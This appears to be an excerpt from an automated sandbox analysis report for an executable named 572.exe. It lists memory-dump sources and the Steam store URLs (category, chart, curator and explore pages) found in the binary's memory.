                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_hobby_sim/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_life/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_physics_sandbox/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sim_space_flight/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/simulation/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/singleplayer/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/space/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports_and_racing/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports_fishing_hunting/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports_individual/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports_sim/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/sports_team/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/story_rich/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_card_board/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_cities_settlements/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_grand_4x/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_military/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_real_time/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/strategy_turn_based/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/survival/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/tower_defense/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/category/visual_novel/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/charts/mostplayed/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/charts/topselling/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/communityrecommendations/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/controller/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/controller/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/curators/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/curators/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/demos/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/digitalgiftcards/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/digitalgiftcards/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/?snr=1_4_4_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/?snr=1_4_4__global-header
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/new/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/new/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/new/?snr=1_4_4__146
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/startnew
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/upcoming/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/upcoming/?snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/upcoming/?snr=1_4_4__tabsmore
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/genre/Early%20Access/?snr=1_4_4__12
